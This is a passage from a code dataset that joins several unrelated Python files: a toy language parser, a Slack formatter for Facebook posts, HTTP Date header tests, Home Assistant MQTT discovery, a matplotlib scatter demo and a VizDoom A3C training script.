BooleanNode(condition)\n elif isinstance(t3, str):\n if isinstance(t1, str):\n condition = t1 in t3\n t[0] = BooleanNode(condition)\n else:\n raise ValueError\n else:\n raise ValueError\n\n\ndef p_expression_cons(t):\n '''expression : expression CONS expression'''\n # t3 must be list\n # print(t[1])\n t[0] = t[3].cons(t[1])\n\n\ndef p_expression_comparison(t):\n \"\"\"expression : expression LES expression\n | expression GRT expression\n | expression LEQ expression\n | expression GEQ expression\n | expression EQUALEQUAL expression\n | expression LESORGRT expression\"\"\"\n # print(t[2])\n # print(t[1].value, t[1])\n # print(t[3].value, t[3])\n t[0] = ComparisonNode(t[2], t[1], t[3])\n # print(t[0].value, t[0])\n\ndef p_expression_bool_op(t):\n \"\"\"expression : expression ANDALSO expression\n | expression ORELSE expression\"\"\"\n # print(t[2])\n # print(t[1].value, t[1])\n # print(t[3].value, t[3])\n t[0] = BoolOpNode(t[2], t[1], t[3])\n # print(t[0].value, t[0])\n\ndef p_expression_not(t):\n 'expression : NOT expression'\n # FIXME: replace value with evaluate\n if not isinstance(t[2].evaluate(), bool):\n raise ValueError\n debug(\"p_expression_not: \", t[2].value)\n t[0] = BooleanNode(not t[2].evaluate())\n debug(\"p_expression_not: \", t[0].value)\n\n\ndef p_expression_uminus(t):\n 'expression : MINUS expression %prec UMINUS'\n t[0] = UminusNode(t[2])\n\n\ndef p_expression_factor(t):\n '''expression : factor\n | indexing'''\n\n t[0] = t[1]\n\n\ndef p_factor(t):\n '''factor : NUMBER\n | BOOLEAN\n | STRING\n | tuple\n | list'''\n debug(\"p_factor \", t[1])\n t[0] = t[1]\n\n\n# def p_expression_list_index(t):\n# 'expression : list LBRACKET expression RBRACKET'\n# t[0] = (t[1])[t[3]]\n\n\ndef p_error(t):\n raise SyntaxError(\"SYNTAX ERROR pattern not found \")\n # print(\"Syntax error at '%s'\" % t.value)\n\n\nyacc.yacc(debug = 0)\n\n\ndef test_one(input=\";\"):\n code = [input]\n # code = [\n # \"11==12 orelse 1>2;\"\n # '1/0;'\n # '-1;'\n # \"[1]::2::[4];\"\n # \"5mod2;\"\n # \"1 + 2.0 * 3.0;\"\n #\n # '1-2;'\n # \"3 div 2;\"\n # \"3 mod 2;\"\n # \"4 mod 2;\"\n # \"true;\"\n # \"'Hello\\\\\\n\\\\\\\\World';\"\n\n # ]\n\n ast = None\n try:\n # lex.input(code)\n # while True:\n # token = lex.token()\n # if not token: break\n # print(token)\n print(\">>>\", code[0])\n ast = yacc.parse(code[0])\n\n # print(ast)\n # print(eval(code))\n # assert ast.execute() == eval(code)\n except AssertionError:\n print(\"AssertionError\")\n except SyntaxError as err:\n # debug(\"err:\", err)\n print(\"SYNTAX ERROR\")\n\n except Exception as err:\n # print(\"err:\", err)\n print(\"SEMANTIC ERROR\")\n\n try:\n # print(ast.execute())\n ast.execute()\n debug(\"executed successfully\")\n except AssertionError:\n print(\"AssertionError\")\n except Exception as err:\n print(\"err:\", err)\n print(\"SEMANTIC ERROR\")\n\n\n# test_one(\"(1<2) andalso False;\")\n# print('------------')\n\n\ndef filecompare(fn1, fn2):\n f1 = open(fn1, \"r\")\n f2 = open(fn2, \"r\")\n for line1 in f1:\n\n for line2 in f2:\n line2 = line2.replace(\"false\", \"False\").replace(\"true\", \"True\")\n if line1.strip() == line2.strip():\n print(\"SAME\\n\")\n else:\n print(\"l1: '\", line1, \"'\")\n print(\"l2: '\", line2, \"'\")\n assert line1.strip() == line2.strip()\n break\n f1.close()\n f2.close()\n\n\ndef file_tests(i=1, j=41):\n for i in range(i, j):\n print(i, \":\")\n infile = \"./cases/input_{}.txt\".format(i)\n comparefile = \"./cases/output_{}.txt\".format(i)\n\n fd = open(infile, 'r')\n codes = []\n for line in fd:\n codes.append(line.strip())\n print(\"input:\", codes)\n\n # codes = [\n # \"('a','b');\",\n # \"(1,2);\",\n # \"1.2 - 1;\",\n # \"2.1 ** 2;\",\n # \"(1-2)------(1-2 );\",\n # \"2--2;\",\n # \"1-2;\",\n # \"2+0;\",\n # \"2/0;\",\n # \"100*22;\",\n # \"2 4;\",\n # # \"'Hello World'\"\n # ]\n outfile = \"./result.txt\"\n\n with open(outfile, 'w+') as outf:\n for code in codes:\n code = code.replace(\"and\", \"andalso\").replace('or', 'orelse').replace(\"false\", \"False\").replace(\"true\",\n \"True\").replace(\n '//', \"div\").replace(\"%\", \"mod\")\n print(code)\n try:\n # lex.input(code)\n # while True:\n # token = lex.token()\n # if not token:\n # break\n # print(token)\n\n ast = yacc.parse(code)\n debug(\"ast:\", ast)\n result = ast.execute()\n debug(\"result:\", result)\n outf.write(str(result))\n # print(comparefile)\n # assert ast.execute() == eval(code)\n except AssertionError:\n print(\"AssertionError\")\n except SyntaxError:\n print(\"SYNTAX ERROR\")\n\n except Exception as err:\n debug(err)\n print(\"SEMANTIC ERROR\")\n outf.write(\"SEMANTIC ERROR\\n\")\n filecompare(outfile, comparefile)\n\n\n# file_tests(1, 42)\n\nif len(sys.argv) != 2:\n sys.exit(\"invalid arguments\")\n\ninfile = sys.argv[1]\nfd = open(infile, 'r')\ncodes = []\nfor line in fd:\n codes.append(line.strip())\ndebug(codes)\n\nfor code in codes:\n if code == \"\":\n continue\n try:\n # lex.input(code)\n # while True:\n # token = lex.token()\n # if not token:\n # break\n # print(token)\n\n ast = yacc.parse(code)\n debug(\"ast:\", ast)\n result = ast.execute()\n debug(\"result:\", result)\n except SyntaxError as err:\n debug(err)\n print(\"SYNTAX ERROR\")\n\n except Exception as err:\n print(\"SEMANTIC ERROR\")\n","sub_path":"sbml3.py","file_name":"sbml3.py","file_ext":"py","file_size_in_byte":19122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"508395328","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport ConfigParser\nimport optparse\nimport unittest\nimport json\nimport sys\n\nsys.path.append('..')\nimport core\n\nfrom model import FacebookItem\n\n\nclass FacebookFormatter:\n def __init__(self, config_name):\n config = ConfigParser.SafeConfigParser()\n config.read(config_name)\n self._logger = core.get_logger('facebook', config_name)\n\n def _format_title(self, account):\n if '-' in account:\n return \" \".join(account.split(\"-\")[:-1])\n else:\n return account\n\n def _to_json(self, item):\n title = self._format_title(item.account)\n text = '<%s|*%s*>' % (item.account_url, title)\n if item.text is not None:\n text = '\\n'.join([text, item.text])\n if item.reposted_item is not None:\n if item.reposted_item.text is not None:\n fields = [\n {'value': item.reposted_item.text, 'short': False}\n ]\n else:\n fields = []\n\n title = self._format_title(item.reposted_item.account)\n attachment = {\n 'title': title,\n 'title_link': item.reposted_item.account_url,\n 'color': '#3E62A8',\n 'fields': fields\n }\n if item.reposted_item.media_url:\n attachment['image_url'] = item.reposted_item.media_url\n data = {'text': text, 'attachments': [attachment]}\n elif item.media_url is not None:\n attachment = {\n 'image_url': item.media_url,\n 'color': '#3E62A8',\n 'fields': []\n }\n data = {'text': text, 'attachments': [attachment]}\n else:\n data = {'text': text}\n return json.dumps(data)\n\n def format_item(self, item):\n result = None\n if item.text or item.media_url or item.reposted_item:\n result = self._to_json(item)\n return result\n\n\nclass FacebookFormatterTest(unittest.TestCase):\n def test_format(self):\n formatter = FacebookFormatter(FacebookFormatterTest._config_name)\n item = FacebookItem(\n account='Info-Blackeberg-256707544468893', \n account_url='https://sv-se.facebook.com/Info-Blackeberg-256707544468893', \n creation_date='Thu Feb 25, kl. 18:17', \n text=u'Lär känna din stadsdel', \n media_url=None\n )\n self.assertTrue(formatter.format_item(item) is not None)\n item = FacebookItem(\n account='Info-Blackeberg-256707544468893', \n account_url='https://sv-se.facebook.com/Info-Blackeberg-256707544468893', \n creation_date='Thu Feb 25, kl. 18:17', \n text=None, \n media_url=None\n )\n self.assertTrue(formatter.format_item(item) is None)\n\nif __name__ == '__main__':\n parser = optparse.OptionParser()\n parser.add_option('--config-file', \n dest='config_name', \n default='staging.ini',\n help='unit test configuration file') \n\n options, args = parser.parse_args()\n FacebookFormatterTest._config_name = options.config_name\n sys.argv[1:] = args\n unittest.main()\n","sub_path":"slack/facebook/facebook_formatter.py","file_name":"facebook_formatter.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"637103470","text":"# -*- coding: utf-8 -*-\n\nimport datetime\n\nimport http_lazy_headers as hlh\n\nfrom . import utils\n\n\nclass DateTest(utils.FieldTestCase):\n\n field = hlh.Date\n\n def test_raw_values(self):\n self.assertFieldRawEqual(\n ['Tue, 15 Nov 1994 08:12:31 GMT'],\n (datetime.datetime(\n year=1994,\n month=11,\n day=15,\n hour=8,\n minute=12,\n second=31),))\n\n self.assertFieldRawEqual(\n ['Sunday, 06-Nov-94 08:49:37 GMT'],\n (datetime.datetime(\n year=1994,\n month=11,\n day=6,\n hour=8,\n minute=49,\n second=37),))\n\n self.assertFieldRawEqual(\n ['Sun Nov 6 08:49:37 1994'],\n (datetime.datetime(\n year=1994,\n month=11,\n day=6,\n hour=8,\n minute=49,\n second=37),))\n\n def test_str(self):\n self.assertFieldStrEqual(\n (datetime.datetime(\n year=1994,\n month=11,\n day=15,\n hour=8,\n minute=12,\n second=31),),\n 'date: Tue, 15 Nov 1994 08:12:31 GMT')\n\n def test_raw_empty(self):\n \"\"\"\n Should NOT allow empty raw value\n \"\"\"\n self.assertRaisesHeaderError([''])\n\n def test_empty(self):\n \"\"\"\n Should NOT allow empty value\n \"\"\"\n self.assertRaisesInternalError(())\n\n def test_raw_bad_values(self):\n \"\"\"\n Should not allow bad raw values\n \"\"\"\n self.assertRawOK(['Tue, 15 Nov 1994 08:12:31 GMT'])\n self.assertRaisesHeaderError(['Tue, 15 Nov'])\n self.assertRaisesHeaderError(['Sun, 15 Nov 1994 08:12:31 GMT'])\n self.assertRaisesHeaderError(['Tue, 15 Nov 1994 08:12:31 UTC'])\n self.assertRaisesHeaderError(['Tue, 15 Nov 1 08:12:31 UTC'])\n\n def test_bad_values(self):\n \"\"\"\n Should not allow bad values\n \"\"\"\n good_date = datetime.datetime(\n year=1994,\n month=11,\n day=15,\n hour=8,\n minute=12,\n second=31)\n self.assertOK([good_date])\n self.assertRaisesInternalError([1])\n self.assertRaisesInternalError(['foo'])\n self.assertRaisesInternalError([None])\n self.assertRaisesInternalError([good_date, good_date])\n","sub_path":"tests/tests_fields_/tests_date.py","file_name":"tests_date.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"373837353","text":"\"\"\"\nSupport for MQTT discovery.\n\nFor more details about this component, please refer to the documentation at\nhttps://home-assistant.io/components/mqtt/#discovery\n\"\"\"\nimport asyncio\nimport json\nimport logging\nimport re\n\nfrom homeassistant.components import mqtt\nfrom homeassistant.components.mqtt import CONF_STATE_TOPIC, ATTR_DISCOVERY_HASH\nfrom homeassistant.const import CONF_PLATFORM\nfrom homeassistant.helpers.discovery import async_load_platform\nfrom homeassistant.helpers.dispatcher import async_dispatcher_send\nfrom homeassistant.helpers.typing import HomeAssistantType\n\n_LOGGER = logging.getLogger(__name__)\n\nTOPIC_MATCHER = re.compile(\n r'(?P\\w+)/(?P\\w+)/'\n r'(?:(?P[a-zA-Z0-9_-]+)/)?(?P[a-zA-Z0-9_-]+)/config')\n\nSUPPORTED_COMPONENTS = [\n 'binary_sensor', 'camera', 'cover', 'fan',\n 'light', 'sensor', 'switch', 'lock', 'climate',\n 'alarm_control_panel']\n\nCONFIG_ENTRY_COMPONENTS = [\n 'binary_sensor',\n 'camera',\n 'cover',\n 'light',\n 'lock',\n 'sensor',\n 'switch',\n 'climate',\n 'alarm_control_panel',\n 'fan',\n]\n\nDEPRECATED_PLATFORM_TO_SCHEMA = {\n 'mqtt': 'basic',\n 'mqtt_json': 'json',\n 'mqtt_template': 'template',\n}\n\n\nALREADY_DISCOVERED = 'mqtt_discovered_components'\nDATA_CONFIG_ENTRY_LOCK = 'mqtt_config_entry_lock'\nCONFIG_ENTRY_IS_SETUP = 'mqtt_config_entry_is_setup'\nMQTT_DISCOVERY_UPDATED = 'mqtt_discovery_updated_{}'\nMQTT_DISCOVERY_NEW = 'mqtt_discovery_new_{}_{}'\n\nTOPIC_BASE = '~'\n\nABBREVIATIONS = {\n 'aux_cmd_t': 'aux_command_topic',\n 'aux_stat_tpl': 'aux_state_template',\n 'aux_stat_t': 'aux_state_topic',\n 'avty_t': 'availability_topic',\n 'away_mode_cmd_t': 'away_mode_command_topic',\n 'away_mode_stat_tpl': 'away_mode_state_template',\n 'away_mode_stat_t': 'away_mode_state_topic',\n 'bri_cmd_t': 'brightness_command_topic',\n 'bri_scl': 'brightness_scale',\n 'bri_stat_t': 'brightness_state_topic',\n 'bri_val_tpl': 'brightness_value_template',\n 'clr_temp_cmd_t': 'color_temp_command_topic',\n 'clr_temp_stat_t': 'color_temp_state_topic',\n 'clr_temp_val_tpl': 'color_temp_value_template',\n 'cmd_t': 'command_topic',\n 'curr_temp_t': 'current_temperature_topic',\n 'dev_cla': 'device_class',\n 'fx_cmd_t': 'effect_command_topic',\n 'fx_list': 'effect_list',\n 'fx_stat_t': 'effect_state_topic',\n 'fx_val_tpl': 'effect_value_template',\n 'exp_aft': 'expire_after',\n 'fan_mode_cmd_t': 'fan_mode_command_topic',\n 'fan_mode_stat_tpl': 'fan_mode_state_template',\n 'fan_mode_stat_t': 'fan_mode_state_topic',\n 'frc_upd': 'force_update',\n 'hold_cmd_t': 'hold_command_topic',\n 'hold_stat_tpl': 'hold_state_template',\n 'hold_stat_t': 'hold_state_topic',\n 'ic': 'icon',\n 'init': 'initial',\n 'json_attr': 'json_attributes',\n 'max_temp': 'max_temp',\n 'min_temp': 'min_temp',\n 'mode_cmd_t': 'mode_command_topic',\n 'mode_stat_tpl': 'mode_state_template',\n 'mode_stat_t': 'mode_state_topic',\n 'name': 'name',\n 'on_cmd_type': 'on_command_type',\n 'opt': 'optimistic',\n 'osc_cmd_t': 'oscillation_command_topic',\n 'osc_stat_t': 'oscillation_state_topic',\n 'osc_val_tpl': 'oscillation_value_template',\n 'pl_arm_away': 'payload_arm_away',\n 'pl_arm_home': 'payload_arm_home',\n 'pl_avail': 'payload_available',\n 'pl_cls': 'payload_close',\n 'pl_disarm': 'payload_disarm',\n 'pl_hi_spd': 'payload_high_speed',\n 'pl_lock': 'payload_lock',\n 'pl_lo_spd': 'payload_low_speed',\n 'pl_med_spd': 'payload_medium_speed',\n 'pl_not_avail': 'payload_not_available',\n 'pl_off': 'payload_off',\n 'pl_on': 'payload_on',\n 'pl_open': 'payload_open',\n 'pl_osc_off': 'payload_oscillation_off',\n 'pl_osc_on': 'payload_oscillation_on',\n 'pl_stop': 'payload_stop',\n 'pl_unlk': 'payload_unlock',\n 'pow_cmd_t': 'power_command_topic',\n 'ret': 'retain',\n 'rgb_cmd_tpl': 'rgb_command_template',\n 'rgb_cmd_t': 'rgb_command_topic',\n 'rgb_stat_t': 'rgb_state_topic',\n 'rgb_val_tpl': 'rgb_value_template',\n 'send_if_off': 'send_if_off',\n 'set_pos_tpl': 'set_position_template',\n 'set_pos_t': 'set_position_topic',\n 'spd_cmd_t': 'speed_command_topic',\n 'spd_stat_t': 'speed_state_topic',\n 'spd_val_tpl': 'speed_value_template',\n 'spds': 'speeds',\n 'stat_clsd': 'state_closed',\n 'stat_off': 'state_off',\n 'stat_on': 'state_on',\n 'stat_open': 'state_open',\n 'stat_t': 'state_topic',\n 'stat_val_tpl': 'state_value_template',\n 'swing_mode_cmd_t': 'swing_mode_command_topic',\n 'swing_mode_stat_tpl': 'swing_mode_state_template',\n 'swing_mode_stat_t': 'swing_mode_state_topic',\n 'temp_cmd_t': 'temperature_command_topic',\n 'temp_stat_tpl': 'temperature_state_template',\n 'temp_stat_t': 'temperature_state_topic',\n 'tilt_clsd_val': 'tilt_closed_value',\n 'tilt_cmd_t': 'tilt_command_topic',\n 'tilt_inv_stat': 'tilt_invert_state',\n 'tilt_max': 'tilt_max',\n 'tilt_min': 'tilt_min',\n 'tilt_opnd_val': 'tilt_opened_value',\n 'tilt_status_opt': 'tilt_status_optimistic',\n 'tilt_status_t': 'tilt_status_topic',\n 't': 'topic',\n 'uniq_id': 'unique_id',\n 'unit_of_meas': 'unit_of_measurement',\n 'val_tpl': 'value_template',\n 'whit_val_cmd_t': 'white_value_command_topic',\n 'whit_val_stat_t': 'white_value_state_topic',\n 'whit_val_tpl': 'white_value_template',\n 'xy_cmd_t': 'xy_command_topic',\n 'xy_stat_t': 'xy_state_topic',\n 'xy_val_tpl': 'xy_value_template',\n}\n\n\nasync def async_start(hass: HomeAssistantType, discovery_topic, hass_config,\n config_entry=None) -> bool:\n \"\"\"Initialize of MQTT Discovery.\"\"\"\n async def async_device_message_received(topic, payload, qos):\n \"\"\"Process the received message.\"\"\"\n match = TOPIC_MATCHER.match(topic)\n\n if not match:\n return\n\n _prefix_topic, component, node_id, object_id = match.groups()\n\n if component not in SUPPORTED_COMPONENTS:\n _LOGGER.warning(\"Component %s is not supported\", component)\n return\n\n if payload:\n try:\n payload = json.loads(payload)\n except ValueError:\n _LOGGER.warning(\"Unable to parse JSON %s: '%s'\",\n object_id, payload)\n return\n\n payload = dict(payload)\n\n for key in list(payload.keys()):\n abbreviated_key = key\n key = ABBREVIATIONS.get(key, key)\n payload[key] = payload.pop(abbreviated_key)\n\n if TOPIC_BASE in payload:\n base = payload[TOPIC_BASE]\n for key, value in payload.items():\n if isinstance(value, str):\n if value[0] == TOPIC_BASE and key.endswith('_topic'):\n payload[key] = \"{}{}\".format(base, value[1:])\n if value[-1] == TOPIC_BASE and key.endswith('_topic'):\n payload[key] = \"{}{}\".format(value[:-1], base)\n\n # If present, the node_id will be included in the discovered object id\n discovery_id = ' '.join((node_id, object_id)) if node_id else object_id\n discovery_hash = (component, discovery_id)\n\n if payload:\n if CONF_PLATFORM in payload:\n platform = payload[CONF_PLATFORM]\n if platform in DEPRECATED_PLATFORM_TO_SCHEMA:\n schema = DEPRECATED_PLATFORM_TO_SCHEMA[platform]\n payload['schema'] = schema\n _LOGGER.warning('\"platform\": \"%s\" is deprecated, '\n 'replace with \"schema\":\"%s\"',\n platform, schema)\n payload[CONF_PLATFORM] = 'mqtt'\n\n if CONF_STATE_TOPIC not in payload:\n payload[CONF_STATE_TOPIC] = '{}/{}/{}{}/state'.format(\n discovery_topic, component,\n '%s/' % node_id if node_id else '', object_id)\n\n payload[ATTR_DISCOVERY_HASH] = discovery_hash\n\n if ALREADY_DISCOVERED not in hass.data:\n hass.data[ALREADY_DISCOVERED] = {}\n if discovery_hash in hass.data[ALREADY_DISCOVERED]:\n # Dispatch update\n _LOGGER.info(\n \"Component has already been discovered: %s %s, sending update\",\n component, discovery_id)\n async_dispatcher_send(\n hass, MQTT_DISCOVERY_UPDATED.format(discovery_hash), payload)\n elif payload:\n # Add component\n _LOGGER.info(\"Found new component: %s %s\", component, discovery_id)\n hass.data[ALREADY_DISCOVERED][discovery_hash] = None\n\n if component not in CONFIG_ENTRY_COMPONENTS:\n await async_load_platform(\n hass, component, 'mqtt', payload, hass_config)\n return\n\n config_entries_key = '{}.{}'.format(component, 'mqtt')\n async with hass.data[DATA_CONFIG_ENTRY_LOCK]:\n if config_entries_key not in hass.data[CONFIG_ENTRY_IS_SETUP]:\n await hass.config_entries.async_forward_entry_setup(\n config_entry, component)\n hass.data[CONFIG_ENTRY_IS_SETUP].add(config_entries_key)\n\n async_dispatcher_send(hass, MQTT_DISCOVERY_NEW.format(\n component, 'mqtt'), payload)\n\n hass.data[DATA_CONFIG_ENTRY_LOCK] = asyncio.Lock()\n hass.data[CONFIG_ENTRY_IS_SETUP] = set()\n\n await mqtt.async_subscribe(\n hass, discovery_topic + '/#', async_device_message_received, 0)\n\n return True\n","sub_path":"homeassistant/components/mqtt/discovery.py","file_name":"discovery.py","file_ext":"py","file_size_in_byte":9603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"169324500","text":"import matplotlib.pyplot as plt\n\n#散点图\n#plt.scatter(2,4) #传递x、y坐标,在指定位置绘制单个点\n\n#plt.scatter(2,4,s=200) # s设置点的大小\nplt.show()\n\n#绘制一系列点,传入列表\n# x_values=[1,2,3,4,5]\n# y_values=[1,4,9,16,25]\n# plt.scatter(x_values,y_values,a=100) #依次从每个列表读取值绘制一个点\n# plt.show()\n\n\nx_values=list(range(1,1001))\ny_values=[i**2 for i in x_values]\n# plt.scatter(x_values,y_values,s=40,edgecolor='none',c=(0.1,0.5,0.8)) #删除轮廓颜色,默认蓝色点和黑色轮廓。#自定义颜色,设置为元组,包含3个0~1之间的小数值\n# plt.axis([0,1100,0,1100000]) #传入参数[xmin, xmax, ymin, ymax],每个坐标轴的取值范围\n# plt.show()\n\n#颜色映射\n#较小的值使用较浅的颜色,大值使用深的颜色\nplt.scatter(x_values,y_values,c=y_values,cmap=plt.cm.Blues,edgecolor='none',s=40) #此处c表示待映射的列表,cmap表示使用哪个颜色映射\n#plt.savefig(\"test.png\",bbox_inches=\"tight\") #自动保存图标到当前目录下。bbox_inches表示将图表多余的空白区域剪裁掉\nplt.show()","sub_path":"graph/scatterplot.py","file_name":"scatterplot.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"44635941","text":"import itertools\nimport numpy as np\nfrom skimage.transform import resize\nimport time\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom vizdoom import DoomGame, Mode, ScreenFormat, ScreenResolution\n\nfrom viz_utils import set_init, plotter_ep_rew, plotter_ep_rew_norm, handleArguments, push_and_pull, record, plotter_ep_time_norm, plotter_ep_time, confidence_intervall\nimport torch.multiprocessing as mp\nfrom shared_adam import SharedAdam\nimport sys\nimport os\nos.environ[\"OMP_NUM_THREADS\"] = \"1\"\n\nUPDATE_GLOBAL_ITER = 5\nGAMMA = 0.9\nMAX_EP = 2000\nframe_repeat = 12\nresolution = (30, 45)\nconfig_file_path = \"VIZDOOM/deadly_corridor.cfg\"\nworker_num = int(mp.cpu_count()) # Number of reincarnations for Agent\n\n\ndef initialize_vizdoom(config):\n game = DoomGame()\n game.load_config(config)\n game.set_window_visible(False)\n game.set_mode(Mode.PLAYER)\n game.set_screen_format(ScreenFormat.GRAY8)\n game.set_screen_resolution(ScreenResolution.RES_640X480)\n game.init()\n return game\n\ndef preprocess(img):\n return torch.from_numpy(resize(img, resolution).astype(np.float32))\n\n\ndef game_state(game):\n return preprocess(game.get_state().screen_buffer)\n\ngame = initialize_vizdoom(config_file_path)\nstatesize = (game_state(game).shape[0])\nstate = game_state(game)\nn = game.get_available_buttons_size()\nactions = [list(a) for a in itertools.product([0, 1], repeat=n)]\n\nprint(\"Current State:\", state, \"\\n\")\nprint(\"Statesize:\", statesize, \"\\n\")\n\nprint(\"Action Size: \", n)\nprint(\"All possible Actions:\", actions, \"\\n\", \"Total: \", len(actions))\nprint(\"Number of used CPUs: \", worker_num)\n\nattack = []\nfor a in range(len(actions)):\n if actions[a][2] == 1:\n attack.append(a)\n\nclass Net(nn.Module):\n def __init__(self, a_dim):\n super(Net, self).__init__()\n self.s_dim = 45\n self.a_dim = a_dim\n self.pi1 = nn.Linear(self.s_dim, 240)\n self.pi2 = nn.Linear(240, 360)\n self.pi3 = nn.Linear(360, a_dim)\n self.v2 = nn.Linear(240, 360)\n self.v3 = nn.Linear(360, 1)\n\n set_init([self.pi1, self.pi2, self.pi3, self.v2, self.v3])\n self.distribution = torch.distributions.Categorical\n\n def forward(self, x):\n pi1 = F.relu(self.pi1(x))\n pi2 = F.relu(self.pi2(pi1))\n logits = self.pi3(pi2)\n v2 = F.relu(self.v2(pi1))\n values = self.v3(v2)\n return logits, values\n\n def set_init(layers):\n for layer in layers:\n nn.init.xavier_uniform_(layer.weight, nn.init.calculate_gain('relu'))\n nn.init.xavier_uniform_(layer.bias, nn.init.calculate_gain('relu'))\n\n def choose_action(self, s):\n self.eval()\n logits, _ = self.forward(s)\n prob = F.softmax(logits, dim=1).data\n m = self.distribution(prob)\n return m.sample().numpy()[0]\n\n def loss_func(self, s, a, v_t):\n self.train()\n logits, values = self.forward(s)\n\n new_values = torch.zeros([len(v_t), 1], dtype=torch.float32)\n # Reshape Tensor of values\n for i in range(len(v_t)):\n for j in range(30):\n values[i][0] += values[i+j][0]\n new_values[i][0] = values[i][0]\n\n td = v_t - new_values\n c_loss = td.pow(2)\n new_logits = torch.zeros([len(v_t), 128], dtype=torch.float32)\n # Reshape Tensor of logits\n for i in range(len(logits[0])):\n countrow = 0\n for j in range(len(logits)):\n logits[countrow][i] += logits[j][i]\n if j % 30 == 0:\n new_logits[countrow][i] = logits[countrow][i]\n countrow += 1\n probs = F.softmax(new_logits, dim=1)\n m = self.distribution(probs)\n exp_v = m.log_prob(a) * td.detach().squeeze()\n a_loss = -exp_v\n total_loss = (c_loss + a_loss).mean()\n return total_loss\n\n\n\nclass Worker(mp.Process):\n def __init__(self, gnet, opt, global_ep, global_ep_r, global_time_done, res_queue, time_queue, action_queue, name):\n super(Worker, self).__init__()\n self.name = 'w%02i' % name\n self.g_ep, self.g_ep_r, self.g_time = global_ep, global_ep_r, global_time_done\n self.gnet, self.opt = gnet, opt\n self.lnet = Net(len(actions)) # local network\n self.game = initialize_vizdoom(config_file_path)\n self.res_queue, self.time_queue, self.action_queue = res_queue, time_queue, action_queue\n\n def run(self):\n total_step = 1\n\n while self.g_ep.value < MAX_EP:\n self.game.new_episode()\n state = game_state(self.game)\n buffer_s, buffer_a, buffer_r = [], [], []\n ep_r = 0.\n while True:\n start = time.time()\n done = False\n a = self.lnet.choose_action(state)\n if a in attack:\n self.action_queue.put(1)\n else:\n self.action_queue.put(0)\n\n r = self.game.make_action(actions[a], frame_repeat)\n\n if self.game.is_episode_finished():\n done = True\n else:\n s_ = game_state(self.game)\n\n ep_r += r\n buffer_a.append(a)\n buffer_s.append(state)\n buffer_r.append(r)\n\n if done or total_step % UPDATE_GLOBAL_ITER == 0: # update network\n # sync\n push_and_pull(opt, self.lnet, self.gnet, done, s_, buffer_s, buffer_a, buffer_r, GAMMA)\n buffer_s, buffer_a, buffer_r = [], [], []\n\n if done:\n end = time.time()\n time_done = end - start\n record(self.g_ep, self.g_ep_r, ep_r, self.res_queue, self.time_queue, self.g_time, time_done, self.name)\n break\n\n state = s_\n total_step += 1\n\n self.time_queue.put(None)\n self.res_queue.put(None)\n self.action_queue.put(None)\n\n\nif __name__ == '__main__':\n\n print (\"Starting A3C Agent for Vizdoom-DeadlyCorridor\")\n time.sleep(3)\n\n timedelta_sum = datetime.now()\n timedelta_sum -= timedelta_sum\n fig, (ax1, ax2) = plt.subplots(2, 1, sharex=True)\n\n if handleArguments().normalized_plot and not handleArguments().save_data:\n runs = 3\n else:\n runs = 1\n\n for i in range(runs):\n starttime = datetime.now()\n\n # load global network\n if handleArguments().load_model:\n model = Net(len(actions))\n model = torch.load(\"./VIZDOOM/doom_save_model/a3c_doom_comb.pt\")\n model.eval()\n else:\n model = Net(len(actions))\n\n # global optimizer\n opt = SharedAdam(model.parameters(), lr=0.001, betas=(0.92, 0.999))\n global_ep, global_ep_r, global_time_done = mp.Value('i', 0), mp.Value('d', 0.), mp.Value('d', 0.)\n res_queue, time_queue, action_queue = mp.Queue(), mp.Queue(), mp.Queue()\n # parallel training\n if handleArguments().load_model:\n workers = [Worker(model, opt, global_ep, global_ep_r, global_time_done,res_queue, time_queue, action_queue, i) for i in range(1)]\n [w.start() for w in workers]\n else:\n workers = [Worker(model, opt, global_ep, global_ep_r, global_time_done, res_queue, time_queue, action_queue, i) for i in\n range(worker_num)]\n [w.start() for w in workers]\n\n # record episode-reward and duration-episode to plot\n res = []\n durations = []\n action = []\n while True:\n r = res_queue.get()\n t = time_queue.get()\n act = action_queue.get()\n\n if r is None or t is None or act is None:\n break\n\n res.append(r)\n durations.append(t)\n action.append(act)\n\n [w.join() for w in workers]\n\n if handleArguments().load_model:\n print(\"Testing! No need to save model.\")\n else:\n print(\"Save model\")\n torch.save(model, \"./VIZDOOM/doom_save_model/a3c_doom_comb.pt\")\n\n endtime = datetime.now()\n timedelta = endtime - starttime\n print(\"Number of Episodes: \", global_ep.value, \" | Finished within: \", timedelta)\n timedelta_sum += timedelta / 3\n\n # Plot results\n if handleArguments().normalized_plot:\n plotter_ep_time_norm(ax1, durations)\n plotter_ep_rew_norm(ax2, res)\n else:\n plotter_ep_time(ax1, durations)\n plotter_ep_rew(ax2, res)\n\n plt.title(\"A3C-Vizdoom (shared NN)\", fontsize=16)\n\n if handleArguments().save_data:\n if handleArguments().load_model:\n scores = np.asarray([res])\n np.savetxt('VIZDOOM/doom_save_plot_data/a3c_doom_comb_test.csv', scores, delimiter=',')\n else:\n scores = np.asarray([res])\n np.savetxt('VIZDOOM/doom_save_plot_data/a3c_doom_comb.csv', scores, delimiter=',')\n\n # Get results for confidence intervall\n confidence_intervall(action)\n\n font = {'family': 'serif',\n 'color': 'darkred',\n 'weight': 'normal',\n 'size': 8\n }\n if handleArguments().normalized_plot:\n plt.text(0, 450, f\"Average Training Duration: {timedelta_sum}\", fontdict=font)\n\n plt.show()\n\n game.close()\n sys.exit()\n\n","sub_path":"VIZDOOM/vizdoom_a3c_comb.py","file_name":"vizdoom_a3c_comb.py","file_ext":"py","file_size_in_byte":9541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"253741167","text":"# coding:utf8\nfrom pyecharts import Bar, Pie\n\n\n# 四核CPU折线图\ndef test_graph():\n from pyecharts import 